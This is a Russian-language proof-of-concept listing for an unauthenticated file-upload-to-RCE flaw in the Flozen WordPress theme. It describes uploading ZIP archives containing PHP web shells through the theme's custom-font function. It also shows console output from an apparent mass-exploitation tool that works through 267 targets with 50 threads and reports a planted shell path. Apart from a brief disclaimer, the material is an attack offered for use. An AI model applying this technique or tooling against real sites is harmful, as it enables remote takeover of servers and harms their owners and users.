
POC
Flozen < 1.5.1 - Неавторизованная произвольная загрузка файлов
Flozen Theme < 1.5.1 - Неавторизованная произвольная загрузка файлов
Описание
Тема Flozen для WordPress (версии до и включая 1.5.1) уязвима к неавторизованной произвольной загрузке файлов из-за отсутствия проверок аутентификации и недостаточной валидации типов файлов в функции flozen_add_new_custom_font(). Это позволяет неавторизованным злоумышленникам загружать произвольные ZIP-файлы, содержащие вредоносный PHP-код (например, веб-шелл), которые автоматически извлекаются в wp-content/uploads/nasa-custom-fonts/, что приводит к полному удаленному выполнению кода (RCE).
~ Оценка CVSS: 9.8 (Критический)
~ Затронутые версии: < 1.5.1
- [?] Enter filename with targets: list.txt
- [?] Enter threads (5-50): 50
- [*] Loading targets...
- [+] Loaded 267 targets
- [*] Starting 50 threads...
- [!] Gak Ada Bro Themes nya!: http://target.com
- [+] Gas Exploit Cuk! http://example.com/ | Version: 1.2.8 🚩💉
- [+] Shell Ada Bro! http://example.com/wp-content/uploads/nasa-custom-fonts/shadow/index.php
Несанкционированное использование систем, которыми вы не владеете или на тестирование которых не имеете разрешения, является незаконным.